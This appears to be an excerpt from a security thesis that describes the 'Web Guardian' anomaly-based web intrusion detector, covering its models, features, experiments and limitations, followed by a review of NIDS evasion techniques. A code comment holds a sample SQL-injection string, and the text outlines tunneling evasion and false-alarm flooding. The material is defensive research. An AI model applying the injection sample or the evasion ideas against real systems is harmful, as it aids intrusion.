If the condition of eq. 4.11 does not hold, an ad-hoc flag is set, in order to signal
this exception to an operator. The operator may further inspect the symbols in Ω
having a number of occurrences close to that of ωR∗, in order to understand the origin of
this exception. The probability threshold of this model is given by the minimum
probability among those assigned to the symbols in Ωnew.

Detection Let us consider the set of distinct symbols Ωnew = {ω1, ω2, · · · , ωR∗}
and their occurrences Onew = {count(ω1), count(ω2), · · · , count(ωR∗)}, obtained
during the training phase. The probability of a generic symbol x is given by:

p[x is legitimate|model-c] = count(x) / ∑_{j∈[1,R∗]} count(ωj)  if x ∈ Ωnew
p[x is legitimate|model-c] = 0  otherwise
(4.13)

That is, we assign a non-zero probability only to symbols in Ωnew.
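
The following Python sketch summarizes model C (the names are ours; the
eq. (4.11) check reuses the factor-of-ten example):

from collections import Counter

def train_model_c(symbols, min_ratio=10):
    # Symbols sorted by decreasing occurrence count; cut at the largest
    # gap between consecutive counts (eq. 4.10, lowest index on ties).
    counts = Counter(symbols).most_common()
    gaps = [counts[j][1] - counts[j + 1][1] for j in range(len(counts) - 1)]
    r_star = (max(range(len(gaps)), key=gaps.__getitem__) + 1) if gaps else len(counts)
    kept, dropped = counts[:r_star], counts[r_star:]
    # eq. (4.11): kept symbols must cover the great majority of occurrences
    flagged = sum(c for _, c in kept) < min_ratio * sum(c for _, c in dropped)
    total = sum(c for _, c in kept)
    probs = {s: c / total for s, c in kept}   # relative frequencies, eq. (4.12)
    threshold = min(probs.values())           # minimum training probability
    return probs, threshold, flagged

def score_model_c(probs, x):
    # eq. (4.13): non-zero probability only for symbols seen in training
    return probs.get(x, 0.0)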

4.4.3 Modeled Web Traffic Features

In this section we describe the features that are currently modeled by Web Guardian.
Furthermore, we outline why the proposed features are useful to spot malicious web
requests (and thus protect against them).
We match each feature to one of the three general models presented above.
In particular, during the training phase, we consider only successful web requests,
i.e. requests receiving a response status 2xx or 3xx [RFC 2616 (1999)].

4.4.3.1 Web applications

For each web application query, we extract (a) the sequence of attributes and (b), for
each attribute, the sequence of input characters. As in HMM-Web, attribute
inputs are processed so that every digit and every letter are substituted by the
special characters N and A, respectively (see Section 4.3.1; a sketch of this codification
follows the list below). Therefore, for each web application

• we instantiate a model A to describe the legitimate sequence of attributes;

• for each attribute of the application, we instantiate a model A to describe the
legitimate sequence of input characters.
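
As a toy sketch of this codification in Python (the function name is ours):

def codify(value):
    # Substitute every digit with 'N' and every letter with 'A',
    # leaving the remaining characters unchanged (as in HMM-Web).
    return ''.join('N' if c.isdigit() else ('A' if c.isalpha() else c)
                   for c in value)

# e.g. codify("17'or'1=1") returns "NN'AA'N=N": the SQL-injection
# meta-characters survive the codification and remain observable.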

As evidenced by HMM-Web, these features allow detecting input validation attacks
with a very high detection rate and a very low false positive rate. However, contrary
to HMM-Web, we do not perform fusion of the outputs of the various models.
Our aim is to employ the output of each model as an anomaly sensor that gives
specific information regarding the input query. Moreover, contrary to HMM-Web,
Web Guardian also acquires the web application inputs provided by POST requests.
In this case, they are enclosed in the message body of the HTTP/HTTPS request
[RFC 2616 (1999)].

For each distinct source IP address, we group web application queries using an
inter-request time threshold t. Within a group, the time interval between each query
and the subsequent one is lower than or equal to t. For each group we extract the number
of queries. By modeling the average number of queries per group, we may detect
automated requests on web applications. To this end, we adopt model B. It is worth
noting that the raw training set for the model is obtained considering all groups, for
all source IP addresses. That is, the distinction between IP addresses is used only
to define each group. Automated requests may be used by attackers to perform
password guessing attacks or automated vulnerability assessments. Some
of these attacks require a relatively high number of requests per unit of time in
order to be effective. In this case, the number of queries per group is expected to
be higher with respect to that of typical users. With this feature we aim to detect
such anomalous events. During the detection phase, we compute the number of web
application queries within the group of the current query (if any). Then, we submit
this value to the model in order to assess whether it is anomalous (too high).
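
A possible sketch of the grouping step in Python (the record format, a list of
(source_ip, timestamp) pairs with timestamps in seconds, is our assumption):

from collections import defaultdict

def group_queries(requests, t):
    # requests: iterable of (source_ip, timestamp) pairs.
    # A new group starts whenever the inter-request time exceeds t.
    per_ip = defaultdict(list)
    for ip, ts in sorted(requests, key=lambda r: r[1]):
        per_ip[ip].append(ts)
    group_sizes = []
    for times in per_ip.values():
        size = 1
        for prev, cur in zip(times, times[1:]):
            if cur - prev <= t:
                size += 1
            else:
                group_sizes.append(size)
                size = 1
        group_sizes.append(size)
    return group_sizes  # these sizes form the raw training set of a model B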

4.4.3.2 Method and HTTP Version

For each web request we extract the method and the HTTP version field. Attackers
may issue web requests with less common methods, e.g. OPTIONS or TRACE, to
gain information about the target web server. Also, automated tools for web server
fingerprinting issue non-existent methods, to get information from the web server's
reply. Thus, requests having non-typical methods are clearly suspicious. Similarly,
the HTTP version field receives a very limited range of values from web browsers.
Therefore, a non-conventional value for this field is clearly suspicious.
We employ a model C for modeling both the method and the HTTP version features.
Each distinct string is considered as a distinct symbol by the model. For example,
the method strings GET and GeT are considered as different symbols. Similarly, the
HTTP version strings HTTP/1,1 and HTTP/1.1 are viewed as different symbols by
the model. During the detection phase, we submit the method and HTTP version
of the current request to their corresponding models.

4.4.3.3 Request headers

By means of request headers, web servers acquire additional input. Depending
on this input, the web server's reply (and the returned informative content) may
change substantially. For example, the Cookie header is typically submitted by web
browsers for authentication, once a user logs into a website. The input string of this
header is typically processed by a web application to authenticate a web request.
Thus, a validation vulnerability on the Cookie input string may be exploited by an
attacker to compromise web applications. This is the so-called Cookie manipulation
attack [CGIsec]. Also, attacks are often carried out by submitting malicious input in
the User-Agent header [Ollmann (2008)]. In any case, the key point is that each header
input should be inspected: it may be processed by a vulnerable web browser, and
perhaps by a vulnerable web application.

For each header, we extract the following features (a sketch of their computation
follows this list):

• input length. When malicious input is injected, its length is typically higher
than that of legitimate input (this is definitely true for buffer overflow attacks). Thus,
this straightforward feature may effectively detect malicious requests. We
model this feature by means of an instance of model B for each header.

• non-alphanumeric input characters. Malicious input typically involves
the insertion of unconventional meta-characters, i.e. characters that are
semantically different with respect to normal input. That is, a well-crafted input
using these characters may (maliciously) change the behavior of the web server,
the web applications or the web browser that will retrieve the generated page. These
characters are typically non-alphanumeric. Thus, for each request header, we
identify the set of (distinct) non-alphanumeric input characters. By identifying
the legitimate non-alphanumeric input characters, we may spot any attempt
to submit malicious input that requires unconventional non-alphanumeric
characters. To this end, we employ model C, for each request header. For
each training request and header, the set of (distinct) non-alphanumeric input
characters is included in the training set of the header. That is, characters
that are present more than once in the training set are associated with distinct
web requests. In such a way, we avoid the poisoning of the training set by
few requests containing many malicious non-alphanumeric characters. On the
other hand, we may assume that a substantial part of the training web requests
are legitimate. During the detection phase, for each header of the current
request we extract the set of distinct non-alphanumeric input characters. We
analyze each one by means of the header-specific model. Then we signal all
input characters having probability below the threshold.

• digit/alphabetic input characters. Excluding non-alphanumeric characters,
some request headers typically receive only numeric values (e.g. the
header Content-Length), while others may receive only letters (e.g. the header
Host, assuming that the website's domain name is composed of letters and
non-alphanumeric characters, e.g. www.example.com). For this reason, for
each header, we defined two types of flag: flagd={Digits, NoDigits} and
flagl={Letters, NoLetters}. flagd is used to signal whether the input
string contains digits or not. Conversely, flagl is used to signal whether the
input string contains letters or not. Thus, we may identify whether a header receives
only digits or only letters (i.e. when mostly only the first flag is true and
the other is false, or vice versa). We may spot malicious input that submits
letters in place of digits, and vice versa (e.g. Content-Length: bad input).
To this end, for each request header encountered in the training requests, and
for each flag type, we instantiate a model C. The training set of this model
contains one symbol (flag value) per header input. During the detection phase,
for each header in the current request we determine the values of flagd and
flagl. Then, we submit these values to the corresponding models, to assess
whether the header input contains some anomalous digit and/or letter character.
If so, we signal an anomaly for the header input.
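
A sketch of these per-header features in Python (the names are ours):

def header_features(value):
    # Per-header features: input length (model B), the set of distinct
    # non-alphanumeric characters (model C), and the two flags (model C).
    non_alnum = {c for c in value if not c.isalnum()}
    flag_d = "Digits" if any(c.isdigit() for c in value) else "NoDigits"
    flag_l = "Letters" if any(c.isalpha() for c in value) else "NoLetters"
    return len(value), non_alnum, flag_d, flag_l

# e.g. header_features("1337") yields (4, set(), "Digits", "NoLetters"),
# while header_features("<script>") yields (8, {'<', '>'}, "NoDigits", "Letters")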

Finally, we extract the sequence of headers. We use model A to describe the
legitimate sequence of headers in a web request. This model is useful to signal
unconventional headers or a suspicious order of known headers (e.g. due to requests
performed by automated tools). For each training request, we extract the sequence
of headers (i.e. a training sample for the model). We employ a special sequence
to take into account requests without headers (e.g. following the HTTP version 0.9
specification). During the detection phase, we extract and analyze the sequence of
headers in the current request.

4.4.3.4 Ratio between rejected and total requests

For each distinct source IP address, we group web requests using an inter-request
time threshold t. Within a group, the time interval between each request and the
subsequent one is lower than or equal to t. Then, for each group of requests we compute
the ratio between rejected and total requests. We consider as rejected all requests
receiving a response code different from 2xx and 3xx [RFC 2616 (1999)]. This feature
is useful to spot exploitation tools, while they are trying to find web applications with
well-known vulnerabilities, or resources with common names (e.g. INSTALL.txt,
index_old.php). These attempts typically cause the server to reject many requests
within a small time interval.

This feature is described through model B. The training set is made up of the ratio
values of each group of training requests, for all source IP addresses. During the
detection phase, we compute the ratio between rejected and total requests within
the group of the current query. Then, we submit this value to the model in order
to assess whether the ratio is anomalous.
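
A sketch of the per-group ratio (assuming the same grouping as above, with the
HTTP status codes of a group as input):

def rejected_ratio(status_codes):
    # A request is rejected when its response status is neither 2xx nor 3xx
    rejected = sum(1 for s in status_codes if not 200 <= s < 400)
    return rejected / len(status_codes)

# e.g. a scanner probing for missing resources:
# rejected_ratio([404] * 45 + [200] * 5) = 0.9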

4.4.4 Architecture
Figure 4.5 shows the architecture of Web Guardian, with focus on the training and
detection phases. These two phases may overlap, since Web Guardian has a multi-thread
implementation. This is important, because web services constantly evolve,
and Web Guardian may be (re)trained in order to keep its models up to date. While
this process is running, our system may continue providing real-time protection.
Our system currently supports the protection of the Apache web server version 2.x
(http://httpd.apache.org/docs/2.0/). We added some code to the Modsecurity
WAF (version 2.5.7; at the time of writing, Modsecurity has reached version 2.5.12,
but it is easy to patch the latest versions with our code), in order to introduce some
useful functionality. Our version of Modsecurity can store each (field of a) web request,
and the header of the web server response, into a MySQL database (to this end, it is
also possible to install a specific Apache module; however, due to some constraints,
we preferred to implement such functionality in Modsecurity).

The central controller represents the core of Web Guardian. The central controller
is able to launch and stop different (concurrent) threads. Three types of
thread are currently supported: (1) a learning thread, (2) a training set analysis
thread and (3) a real-time detection thread. The learning thread acquires a set of
requests from the database and produces the set of legitimate traffic models (one
for each modeled feature). The training set analysis thread employs the current
models to analyze the requests employed during the training phase. This is useful to
make sure that the models did not (erroneously) discard relevant samples. Finally,
the real-time analysis thread loads the current models and performs real-time analysis
of incoming web requests. It may also perform some predefined counteraction, once
suspicious web traffic is detected.

We may interact with Web Guardian (i.e. the central controller) through a
web-based graphical interface. Through this interface we may send commands (or
queries) to the central controller, which in turn replies with the requested information.
For example, we may launch one of the threads mentioned above. Also, we
may check their status (e.g. progress, errors etc.). If false alarms are found, we may
ask Web Guardian to update the model(s) which erroneously raised the anomaly.
The model update may be performed either by changing the probability threshold
or by (re)training the model, including more samples (i.e. samples previously discarded
by the learning framework). In such a way, similar false alarms are also switched off.

4.4.5 Experiments
In order to evaluate the performance of Web Guardian, we installed our version
of Modsecurity on a production web server of our academic institution. This web
server was dedicated to supporting a web portal, with a number of web applications.
We collected real web traffic on this web server for about a week. Due to the
relevant number of users accessing the portal, these few days were sufficient to gather
a high number of web requests. Table 4.2 shows the main characteristics of the collected
dataset. Let us refer to this dataset as Λ. The dataset Λ contains about a week of
traffic, and accounts for about 450,000 requests. About 100,000 of such requests
(i.e. 22%) are associated with web application queries.

We subdivided dataset Λ into two datasets: Σ, composed of the first 200,000 requests
of Λ, and T, containing all the remaining requests. Dataset Σ has been used to
train our detection system (it is worth noting that we may not randomly split dataset
Λ, because some features depend on the sequence of requests over time). To this end,
we employed a computer with an Intel Core2 Duo 8100 CPU @ 2.1GHz, 2GB of RAM,
and the Linux (Ubuntu 8.04) operating system. The training phase required 2 hours
and 53 minutes, and a peak of 1.6GB of used RAM. According to the proposed learning
framework (see Section 4.4.1), the training phase required no supervision (nor any
ad-hoc setting of parameters).

At the end of the training phase, we evaluated the effectiveness of the learning
framework of Section 4.4.1. To this end, we spotted attacks inside the dataset
Λ with the help of our system (recall that, due to the ad-hoc nature of web applications,
we may not rely on signature-based systems to perform this task). This task has been
performed in a way similar to HMM-Web. In particular, we proceeded as follows.
For models having a relatively large number of samples, we manually inspected the
samples receiving the lowest likelihood. Conversely, for models having a relatively
low number of samples, we manually inspected all samples. On the basis of our
experience, and by using known-as-legitimate inputs as a reference (we verified
legitimate web application inputs through the links contained inside web pages, by
browsing as a normal web user), we manually labelled all attacks in Λ.
Now let us recall the key reasons for this approach.
Now let us recall the key reasons for this approach.

For models built using a relatively high number of samples (e.g. a thousand),
there is a good chance that a substantial part of samples is related to legitimate be-
havior. This means that malicious samples are expected to receive lower probability
with respect legitimate samples. Recall that bad guys are typically in lower number
with respect to legitimate guys. On the other hand, known web exploits typically
show very dierent features with respect to legitimate requests. Thus for models
receiving a relatively high number of samples, we expect that they substantially
describe legitimate behavior.

This reasoning is not valid for models having a little number of training samples
(e.g. 20). In the worst case, these samples may be all related to attacks. Thus, a
manual inspection of all samples is necessary.

Overall, we found 232 attacks in Λ. We labelled as legitimate all the other web
requests in Λ. Surprisingly, our learning framework allowed Web Guardian to
(autonomously) detect all the attacks inside the set Λ. A portion of them (102 attacks)
was among the requests employed to train Web Guardian (Σ). On the other hand, Web
Guardian raised a total of 1,252 false alarms (i.e. a false alarm rate of 0.28%) on set
Λ. In particular, it raised 450 false alarms (0.22%, 150 false alerts per day) while
analysing its training set, and 802 (0.32%, 267 false alerts per day) while analysing
the remaining requests (i.e. dataset T). On average, Web Guardian currently takes
about 1.2 milliseconds to analyze a web request within Λ (response time).

To better evaluate the detection rate of our system, we built a set of malicious
web requests Φ against both the web server and the web applications of the portal. We
then evaluated how many of them were actually detected by Web Guardian. Our
malicious requests targeted input validation vulnerabilities (the typical and most
threatening vulnerabilities). These requests have been thoroughly tailored to the
specific configuration of web server and web application inputs. That is, we ideated
proof-of-concept attacks against the web portal, using a number of reference documents
and known vulnerabilities (and, of course, our expertise). It is worth noting
that these attacks have been crafted in order to highlight security vulnerabilities,
but without actually exploiting them.

Table 4.3 summarizes the key characteristics of the dataset Φ. Overall, it accounts
for 507 attacks against the web portal under analysis. For SQL Injection and
XSS attacks we also used some typical filter evasion techniques (see Section 4.1). We
analyzed these well-crafted malicious requests with Web Guardian, and 505 (99.6%)
of them have been detected. Indeed, these attacks show features which
are definitely different from those of typical web requests. The (only) two attacks that
have not been detected were related to information gathering attempts, and highlight
some limitations of our system (see Section 4.5).

time interval               27 November - 3 December, 2009
number of web requests      447,178
distinct IP addresses       1,703
bad requests                5,507
web application queries     98,900
number of web applications  217

Table 4.2: Overview of the key characteristics of the dataset Λ employed to evaluate
the performance of Web Guardian.

4.4.5.1 Discussion

Table 4.4 outlines the performance of Web Guardian, in terms of (a) detection rate, (b)
false alarm rate and (c) average response time per request, evaluated on the datasets Λ
and Φ.
Our results clearly highlight that Web Guardian is able to accurately spot attacks
even if they are included in the set of requests used for training. We detected all the
attacks encountered in the wild (i.e. within dataset Λ) and almost all of our custom
attacks in the dataset Φ. Thus, our results clearly show that Web Guardian has
excellent detection performance. Moreover, its response time is significantly low
(considering that we did not optimize the code of Web Guardian). In addition,
Web Guardian generates a very low false positive rate (0.2-0.3%). Nevertheless, the
number of false positives per day may be relevant, especially for popular websites.
For the dataset under analysis, by analyzing the set of requests not employed for
training we obtained on average 267 false alerts per day. This value is slightly
higher than the number of false alarms obtained by analyzing the set of
training requests. This is reasonable, since we used a limited statistical sample of
web requests. In fact, by reducing the memory needed by our system (i.e. optimizing
the implementation), we could use a larger statistical sample.

It is worth noting that a significantly lower false positive rate may be attained
by manually verifying false alarms through our web interface. Using such an interface
we may:

• group anomalies depending on their type: i.e. the model which raised
the anomaly, common traits of the anomaly (e.g. a suspicious non-alphanumeric
character), source IP address, targeted web application/header;
• adjust model thresholds, so that attacks may still be reliably evidenced
while false alarms are reduced;

• (re)train models using samples which have been erroneously discarded
by the learning framework (e.g. because there were no attacks in the set of
training samples).

Target: web application queries (412 attacks)
  Details: 90 distinct web applications and 372 attributes
  Attack types: cross-site scripting, SQL injection, remote code execution,
  remote file inclusion, information gathering
  References: [Spett (2002)], [Admin (2002)], [Mac Vittie (2007)],
  [Hansen (2009)], [Pastor (2009)], [Auger (2010)], [L0t3k]

Target: headers (78 attacks)
  Details: Accept, Accept-Language, Referer, Content-Type, Accept-Encoding,
  User-Agent, Host, Content-Length, Connection, Cache-Control, Cookie, Via,
  X-Forwarded-For, If-Modified-Since
  Attack types: generic buffer overflow, cross-site scripting, SQL injection,
  HTTP request smuggling, CRLF injection
  References: [Bellamy (2002)], [PSS (2002)], [Linhart et al. (2005)],
  [Symantec (2006)], [CAPEC (2007)], [Bajpai (2009)], [Mac Vittie (2010)]

Target: method (12 attacks)
  Details: PROPFIND, OPTIONS, TRACE and bad strings
  Attack types: buffer overflow, cross-site scripting, information gathering
  References: [Donaldson (2002)], [Juniper (2002)], [Manion (2003)], [Shah (2004)]

Target: HTTP version (5 attacks)
  Details: bad format string
  Attack types: buffer overflow, information gathering
  References: [Donaldson (2002)], [Shah (2004)]

Table 4.3: Overview of the attacks performed against the website under evaluation
(dataset Φ).

Parameter          Dataset     Value
detection rate     Λ = Σ ∪ T   232 attacks out of 232, 100%, ~39 alerts/day
                   Φ           505 attacks out of 507, 99.6%
false alarm rate   Λ           1,252 alerts / 447,178 reqs, 0.28%, ~209 alerts/day
                   Σ           450 alerts / 200,000 reqs, 0.22%, ~150 alerts/day
                   T           802 alerts / 247,178 reqs, 0.32%, ~267 alerts/day
response time      Λ           1.2 milliseconds

Table 4.4: Overview of the performance of Web Guardian evaluated on datasets Λ
and Φ. Web Guardian has been trained on Σ (the first 200,000 requests of Λ).


For example, with a few clicks (ten minutes of work), by manually adjusting model
thresholds, we reduced the total number of false alarms from 1,252 to about 400
(all the attacks inside Λ were still detected).
Through the web interface we may also define the association between anomalies
and counteractions. A different counteraction may be specified depending on the
anomaly type(s), the output probabilities of the models and their reliability (for each
model, we may evaluate the average number of false alarms it raises and its number of
training samples; these two parameters are used as a reference to outline the reliability
of each model). This part is critical to some extent, since we have to make sure that
legitimate traffic is never affected by Web Guardian. So we may provide strong
counteractions (e.g. drop the TCP connection, return the home page) only on the basis
of (a) very reliable models, e.g. with very few false alarms, (b) output probabilities
well under the threshold, (c) multiple anomalies. Otherwise, we may provide safer
counteractions. For example, the work [Valeur (2006)] proposes an anomaly-driven
reverse proxy to protect web applications. This approach is very interesting as it
provides automated counteractions that may work well even in the presence of some
false alarms. If an anomalous request is detected, it is forwarded to a copy of the
website that does not hold sensitive content. In such a way, even if a false alert is
raised, legitimate users may still access the website contents that are not sensitive
(e.g. public).

4.5 Limitations, proposed solutions and future work

With HMM-Web we showed experimentally how Hidden Markov Models may be
exploited to detect web application attacks, and thus protect web services. Due to
the ad-hoc nature of web applications, the anomaly-based approach of HMM-Web
is very effective in detecting input validation attacks. Moreover, HMM-Web may save
security administrators a lot of time, since it is unsupervised and deals with dirty
web traffic. The main limitation of HMM-Web is that it may only detect attacks
that submit malicious input through HTTP GET requests. Furthermore, it does
not support any automatic counteraction.

Thus, we ideated Web Guardian. Through Web Guardian we may potentially
detect any attack exploiting input validation vulnerabilities, as well as automated
attacks against web services. Also, we may counteract in real time if one or more
anomalous requests are found. Some preliminary experiments show that Web Guardian
can accurately detect web attacks, with low false alarm rates. Of course, more
extensive testing is necessary, but our approach appears very promising. Nevertheless,


no perfect system exists in our world, and Web Guardian is definitely no exception.
So, it is important to recognize the main limitations of our detection system.
First, Web Guardian models (web application) attribute inputs by generalising
letters and numbers. This allows a significant reduction of the HMM learning time,
and of the false positives due to random inputs (e.g. session identifiers). For example,
the numbers between 100 and 999 are all represented by the same sample {N,N,N}.
Assuming that such numbers are submitted to an attribute, e.g. to identify a category
inside the website, some of them may not be accepted by the web application (e.g. because
no category is associated with them), causing an error. An attacker
may exploit this exception to gain information about the target application. In
fact, two attacks in Φ used a similar technique, and they have not been detected
by Web Guardian. This example is useful to highlight a general limitation of our
detection system: it may not detect attacks targeting the logic of web applications.
That is, we are not modelling the internal processing of web applications.
To this end, other web traffic features are necessary. Thus, a possible improvement
of Web Guardian may be the modelling of new features regarding the logic of web
applications. Currently, the set of extracted features mainly supports the detection
of input validation attacks, because they are the most popular and threatening
attacks.
Another limitation of Web Guardian is inherited from the traditional anomaly-based
approach to the detection of computer intrusions. That is, we may evidence
detailed anomalies, but currently these are not associated with a description of the
attack, as in signature-based systems. To overcome this limitation, we are currently
working on the automatic classification of anomalies. We are also working on the
automatic inference of the attack class, given an anomaly. Our idea is similar to
that proposed in [Robertson et al. (2006)] and, in particular, in [Bolzoni et al. (2009)].
Finally, as we will further discuss in Section 5.5.1.1, anomaly-based systems
may be subject to false alarm injection (actually, as we will discuss in Chapter 5,
all IDS suffer from this problem). Let us suppose that Web Guardian is
protecting a website in real time. An adversary (using a single IP address) may
deliberately submit a very high number of web requests (e.g. 100,000) that do not
harm the website, but raise a lot of (false) alarms. Among these requests, he may
submit the real exploit against the monitored web services. In this case, it is likely
that the security administrator does not verify all the alerts (100,000!). He may verify
only a portion of them and, upon assessing that they are not actually dangerous, he
may throw out all the alerts having the same source. Thus the attacker can successfully
compromise the monitored web services without actually being detected. Of course,
in this case we are assuming that no automatic counteraction is performed by Web
Guardian against the true exploit. Thus, automatic counteractions may actually
counter this kind of attack. However, as a matter of fact, false alarm injection attacks
are not currently addressed by Web Guardian. As future work, we intend to research
solutions to this issue as well.

Figure 4.1: HMM-Web scheme. The Parser processes the request URI and identifies
the web application (i.e. search.php) and its input query. By applying a threshold
on the probability value associated with the codified query, the query is labeled as
legitimate/anomalous. The threshold depends on the web application probability and
on the α parameter.

[Figure: two bar charts over the 14 most frequent web applications in the training set.
Top panel ("TRAINING SET - the 14 most frequent web applications"): number of
queries per web application (up to about 70,000). Bottom panel: percentage of attacks
per web application (ranging from 0% to about 10%).]

Figure 4.2: Distribution of queries and percentage of attacks for the 14 most frequent
web applications.

Figure 4.3: Average DR and FPR for different values of α and a single HMM per
ensemble. The proposed query codification solution is compared with that used in
[Kruegel et al. (2005) (a)].

Figure 4.4: Average DR and FPR for different values of α, either with a single or
with multiple HMM per ensemble.

Figure 4.5: Architecture of Web Guardian. Our detection system may be controlled
through a web interface.

Figure 4.6: Some attacks detected by Web Guardian (as shown by our web interface).
These attacks were contained in the set of training requests.
Chapter 5

Intrusion Detection and

Adversarial Environment

When I have won a victory I do not repeat my tactics but


respond to circumstances in an infinite variety of ways.

Sun Tzu

The aim of today's cyber criminals is to realize attacks without being detected
by security administrators (or computer users). For example, this may allow the
attacker to place access points on violated computers for further (stealthy) criminal
actions. In other terms, the IDS itself may be deliberately attacked by a
skilled adversary. Some recent work tried to find the best protection strategy by
leveraging the definition of an attacker model [Cordasco and Wetzel (2009)],
or by assuming a rational attacker and employing a game-theoretical framework
[Chen and Leneutre (2009)]. In any case, a rational attacker leverages the weakest
component of an IDS to compromise the reliability of the entire system, possibly
with minimum cost.
It is easy to see that this problem cannot be completely avoided, as absolute
security does not exist. On the other hand, the recognition of such a threat, and
knowledge of it, may help in devising an IDS model which reduces the impact of the threat.
Of course, many research papers have in some way dealt with this problem.
Unfortunately, such works focus on specific topics, discuss attacks against
specific IDSs, and use different terms for the same general concepts. Often the analysis is
focused on specific phases of the intrusion detection task, and the mutual dependence
of each phase on the others is neglected. There is a good reason for this, since
the problem is fairly complex, and must consider many (uncertain) variables. As a
consequence, an overall picture of the problem is still lacking.
In this Chapter of the thesis we give our contribution to fill this gap. First, we
subdivide the general design of an IDS into different phases and components. To this
end we refer to the CIDF scheme presented in Section 1.3. In particular, we further
subdivide the analysis box of the CIDF scheme according to the analogy between
intrusion detection and pattern recognition (see Section 1.3.1).
Then, we critically analyze how the adversarial environment may affect the IDS
in each one of its components. This study allows gaining a wide knowledge of the
problem, and supports the design of robust IDS solutions. Furthermore, if the goal
is to choose the best security solution on the market, our analysis may provide
concrete support. Some concepts will be illustrated through real-world examples, mainly
related to the web, as it currently accounts for the majority of vulnerabilities (see
Section 2.1).

At the end of the Chapter, it will be clear that the architecture of Flux Buster
and Web Guardian reflects many of the key points we outline for adversary-aware
IDS solutions. This is important, as we strongly believe that adversary-aware IDS
solutions are the right response to current and future security threats.

The Chapter is organized as follows. A detailed analysis of the data acquisition, data
preprocessing, feature selection, model selection, and classification/result analysis
steps is reported in Sections 5.1, 5.2, 5.3, 5.4 and 5.5, respectively. Sections 5.6 and 5.7
analyze the impact of an adversarial environment on the storage and countermeasure
boxes. Then, Section 5.8 highlights the key points which derive from the study of
the whole problem, and gives the reader a guideline for the development/choice of
adversary-aware IDS solutions. Finally, in Section 5.9 conclusions are drawn, and
possible future work directions are outlined.

5.1 Data Acquisition

In this Section we discuss the problems and solutions of the data acquisition
step in an adversarial environment. After a brief presentation of the motivations
and purposes of the data acquisition phase, we will discuss the impact of
the adversarial environment, with reference to the two main classes of IDS: NIDS
(Section 5.1.1) and HIDS (Section 5.1.2).

Motivation and purposes To perform intrusion detection, it is necessary to acquire
input data about the events occurring on computer systems. In the data acquisition
step these events are represented in a suitable way to be further analyzed. This step is
of key importance, because from the acquired data it is desirable to extract (measure) all
the features that allow distinguishing legitimate activities from attacks.
The event features related to computer systems represent the information source that
supports the intrusion detection task.

Problem overview Any inaccuracy in the design of the representation of events
will compromise the reliability of the results of the analysis box, because an adversary
can either exploit a lack of detail in the representation of events, or induce a
flawed event representation. Some inaccuracies may be addressed with an a posteriori
analysis, that is, by verifying what is actually occurring on the monitored host(s)
when an alert is generated. Such an analysis will be discussed in Section 5.5.4.

5.1.1 Network Data Acquisition

Motivation and purposes With respect to HIDS, NIDS are relatively easy to
deploy because they only need a network node, while HIDS have to be installed on
the monitored computers. Due to their nature, NIDS are useful to detect attacks
that involve low-level manipulation of the network traffic. In particular, NIDS allow
detecting attacks against multiple machines on the network. Furthermore, it may be
difficult for an attacker to remove the traces of detected attacks, because NIDS
are not placed on the target machines. NIDS sensors are deployed at a specific network
node, and typically send the results of their analysis to a central console running on
a dedicated host.

It is worth noting that NIDS can be easily employed to prevent intrusions
[Lunt et al. (1992)], as they may analyze network traffic before it is processed by
the destination hosts.

5.1.1.1 Adversary actions against Network Data Acquisition: Problems

The first problem of NIDS is that they can only simulate the packet processing performed by the destination hosts. As pointed out in [Ptacek and Newsham (1998)], NIDS usually rely upon a mechanism of data collection (called passive protocol analysis) which is fundamentally flawed, because "there isn't enough information on the wire on which to base conclusions about what is actually happening on networked machines".

The reason for this gap is that network traffic is typically processed by different host-side operating systems and applications. Such systems may process the network traffic in a way that is not fully adherent to the relevant standards (i.e., RFCs), or may implement only some of the functionalities described by these standards. In addition, even if different implementations are perfectly adherent to a specific standard, they might process the traffic in different ways in situations that are not covered by the standard. Finally, destination hosts may process the traffic at different network nodes, and therefore with different views of the traffic. It follows that, in principle, a NIDS should be designed to incorporate all the knowledge on the traffic-processing mechanisms employed by operating systems and application software, as well as on the network topology. Unfortunately, this is definitely a hard task in a real scenario. Thus, NIDS typically use a pre-defined traffic-processing mechanism that is assumed to be coherent with all the hosts in the network, and the NIDS is assumed to be placed in the same network node as the monitored hosts.

This lack of knowledge can lead to a flawed generation of events. A number of papers in the literature showed how such fake events can be used to evade an IDS. We note that similar techniques can be used by an adversary to pollute the training data used by security specialists to design and deploy NIDS. Therefore, it is useful to review these techniques in order to understand how an adversary can attack the learning phase of NIDS.

Attack techniques against network data acquisition First of all, it is worth noting that in switched networks a NIDS sensor can only analyze packets that travel through its own segment. As a consequence, an evasion can occur simply because an attack does not involve this segment. In general, correct NIDS sensor placement is a very important task, because an incorrect choice can leave critical network assets exposed to unobservable (evading) attacks.

To the best of our knowledge, the most comprehensive work to date that thoroughly analyzes evasion attacks against NIDS is [Ptacek and Newsham (1998)]. The problems presented there still represent open issues and concrete threats, as confirmed in [Hernacki et al. (2005)]. In [Ptacek and Newsham (1998)], the evasion of NIDS (called elusion in that paper) is posed in terms of insertion and exclusion of packets in the traffic as seen by the NIDS (we use the term exclusion for the sake of clarity; the original term was evasion). An insertion attack consists in inducing a NIDS to accept one or more packets that will be rejected by the target system; conversely, an exclusion attack consists in inducing a NIDS to discard (or ignore) a packet that will be accepted by the target system.

This goal may be achieved by means of some well-known evading attacks against NIDS: tunneling, desynchronization, encoding variations, and segmentation and reordering [Hernacki et al. (2005)].

The tunneling technique aims to hide an attack by enclosing it in a tunnel [Hernacki et al. (2005)]. The tunnel is a type of traffic that is ignored by, or not observable to, the monitor, so tunneling can be classified as an exclusion attack. An example of tunneling for the evasion of intrusion detection is the use of an encrypted channel to hide the attacks, e.g., using Secure SHell (SSH) [RFC 4252 (2006)] [Brown (2003)]. An encrypted channel is used to guarantee the confidentiality of an information flow during its travel from the source to the destination. Even if the data is captured by an attacker, it is very difficult to (find the correct decryption key and) reconstruct the original flow. The NIDS has the same problem, as it cannot analyze encrypted traffic, such as SSH or HTTPS [RFC 2818 (2000)], unless it is provided with the correct decryption key. Nevertheless, providing the key increases the exposure of the traffic flow to confidentiality attacks, since a vulnerability in the NIDS may compromise the confidentiality of any encrypted traffic flow passing through it. Tunneling can also be accomplished by using non-standard ports. For example, many IDS identify the monitored services through the port field of the TCP/UDP headers; thus, if the port does not match the standard port of the carried protocol (e.g., HTTP traffic on port 22, conventionally used by SSH), the analysis can fail or the traffic can be neglected. In practice, tunneling is the technique routinely used for evading NIDS [Hernacki et al. (2005)].

